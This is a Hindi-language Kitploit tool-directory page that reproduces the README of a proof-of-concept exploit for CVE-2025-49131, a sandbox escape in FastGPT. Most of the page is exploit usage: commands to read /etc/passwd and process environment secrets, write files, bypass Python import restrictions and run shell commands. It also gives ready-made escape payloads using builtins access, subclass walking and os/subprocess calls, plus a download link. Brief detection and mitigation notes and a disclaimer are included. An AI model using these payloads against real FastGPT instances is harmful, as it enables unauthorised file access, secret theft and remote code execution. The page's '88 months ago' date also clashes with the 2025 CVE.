Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-49131-poc — CVE-2025-49131 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, FastGPT में सैंडबॉक्स एस्केप जो सैंडबॉक्स API के माध्यम से मनमाना फ़ाइल पढ़ने/लिखने, आयात बाईपास और रिमोट कोड निष्पादन की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/wenura17125/cve-2025-49131-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूलकंटेनर एस्केप
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

CVE-2025-49131 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, FastGPT में सैंडबॉक्स एस्केप जो सैंडबॉक्स API के माध्यम से मनमाना फ़ाइल पढ़ने/लिखने, आयात बाईपास और रिमोट कोड निष्पादन की अनुमति देता है।

रिपॉजिटरी देखें
88 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49131 - FastGPT सैंडबॉक्स एस्केप POC

root@kitploit:~
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT Sandbox Container Escape   ║
        ║      Affected: < v4.9.11             ║
        ╚═══════════════════════════════════════╝

🎯 भेद्यता अवलोकन

FieldValue
CVE IDCVE-2025-49131
CVSS Score6.3 (मध्यम)
CVSS VectorAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Vulnerability TypeSandbox Escape
Affected SoftwareFastGPT (fastgpt-sandbox container)
Affected Versions< 4.9.11
Patched Version4.9.11+
Disclosure Date9 जून, 2025

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है।

  • केवल उन सिस्टमों पर परीक्षण करें जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • सभी लागू कानूनों और विनियमों का अनुपालन करें

📖 विवरण

CVE-2025-49131, FastGPT के fastgpt-sandbox कंटेनर में एक सैंडबॉक्स एस्केप भेद्यता है। यह भेद्यता निम्न कारणों से मौजूद है:

  • अपर्याप्त अलगाव तंत्र - सैंडबॉक्स Python बिल्ट-इन को ठीक से प्रतिबंधित नहीं करता
  • अत्यधिक अनुमत सिस्टम कॉल - खतरनाक syscalls को अवरुद्ध नहीं किया गया है
  • अपर्याप्त कोड निष्पादन प्रतिबंध - आयात प्रतिबंधों को बायपास किया जा सकता है

प्रभाव

सफल शोषण से हमलावर निम्न कार्य कर सकता है:

  • ✅ मनमानी फ़ाइलें पढ़ सकता है - /etc/passwd, कॉन्फ़िगरेशन फ़ाइलें, रहस्यों तक पहुंच
  • ✅ मनमानी फ़ाइलें लिख सकता है - सिस्टम फ़ाइलों को संशोधित कर सकता है, दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है
  • ✅ Python आयात प्रतिबंधों को बायपास कर सकता है - os, subprocess मॉड्यूल आयात कर सकता है
  • ✅ संभावित RCE - आयातित मॉड्यूल के माध्यम से सिस्टम कमांड निष्पादित कर सकता है

🚀 त्वरित आरंभ

root@kitploit:~
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Install dependencies
pip install -r requirements.txt

# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect

# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd

# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"

🔧 भेद्य वातावरण सेटअप करें

root@kitploit:~
# Start vulnerable and patched containers
docker-compose up -d

# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002

💻 उपयोग

डिटेक्शन मोड (गैर-विनाशकारी)

root@kitploit:~
python poc.py --target http://localhost:3001 --detect -v

मनमानी फ़ाइलें पढ़ें

root@kitploit:~
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

फ़ाइलें लिखें

root@kitploit:~
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

आयात बायपास

root@kitploit:~
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

पर्यावरण चर

root@kitploit:~
python poc.py --target http://localhost:3001 --env

दूरस्थ कोड निष्पादन

root@kitploit:~
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

पूर्ण विकल्प

root@kitploit:~
python poc.py --help

📁 परियोजना संरचना

root@kitploit:~
cve-2025-49131-poc/
├── poc.py                # Main exploit script
├── payloads.py           # Payload generator library
├── docker-compose.yml    # Test environment
├── requirements.txt      # Python dependencies
├── README.md             # This file
└── tests/
    └── test_exploit.py   # Automated tests

🔬 तकनीकी विवरण

भेद्यता का मूल कारण

FastGPT सैंडबॉक्स को उपयोगकर्ता द्वारा प्रस्तुत कोड को एक पृथक वातावरण में निष्पादित करने के लिए डिज़ाइन किया गया है। हालाँकि, अलगाव तंत्र अपर्याप्त हैं:

  1. Python __builtins__ एक्सेस - सैंडबॉक्स open(), __import__() जैसे बिल्ट-इन फ़ंक्शंस तक पहुँच को ठीक से प्रतिबंधित नहीं करता।

  2. Syscall फ़िल्टरिंग - अनुमत syscall सूची में खतरनाक कॉल शामिल हैं जो फ़ाइल सिस्टम तक पहुँच को सक्षम करती हैं।

  3. आयात प्रतिबंध बायपास - मॉड्यूल आयात प्रतिबंधों को बायपास करने के लिए कई तकनीकें मौजूद हैं।

शोषण प्रवाह

root@kitploit:~
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using:       │
│    - __builtins__ manipulation              │
│    - Subclass walking                       │
│    - Import bypass techniques               │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to:                          │
│    - File system (read/write)               │
│    - os/subprocess modules                  │
│    - Environment variables                  │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Impact:                                  │
│    - Data exfiltration                      │
│    - Code injection                         │
│    - Remote command execution               │
└─────────────────────────────────────────────┘

उदाहरण पेलोड

फ़ाइल पढ़ना:

root@kitploit:~
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

आयात बायपास:

root@kitploit:~
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)

RCE:

root@kitploit:~
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ पहचान और शमन

पहचान

सैंडबॉक्स लॉग में संदिग्ध गतिविधि देखें:

  • /etc/passwd, /etc/shadow तक पहुँचने का प्रयास
  • __builtins__, __import__ के कॉल
  • Subprocess या os मॉड्यूल का उपयोग
  • असामान्य फ़ाइल रीड/राइट ऑपरेशन

शमन

  1. FastGPT को अपग्रेड करें संस्करण 4.9.11 या बाद में
  2. नेटवर्क अलगाव - सैंडबॉक्स कंटेनर के नेटवर्क एक्सेस को सीमित करें
  3. संसाधन सीमाएँ - कंटेनरों पर CPU/मेमोरी सीमाएँ लागू करें
  4. निगरानी - सैंडबॉक्स गतिविधियों के लिए लॉगिंग और अलर्टिंग लागू करें

📚 संदर्भ

  • NVD - CVE-2025-49131
  • FastGPT GitHub
  • GitHub सुरक्षा सलाह
  • FastGPT दस्तावेज़ीकरण

⏱️ समयरेखा

तिथिघटना
2025-??-??भेद्यता की खोज
2025-??-??विक्रेता को सूचित किया गया
2025-06-??पैच जारी (v4.9.11)
2025-06-09सार्वजनिक प्रकटीकरण

📄 लाइसेंस

यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें।


सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें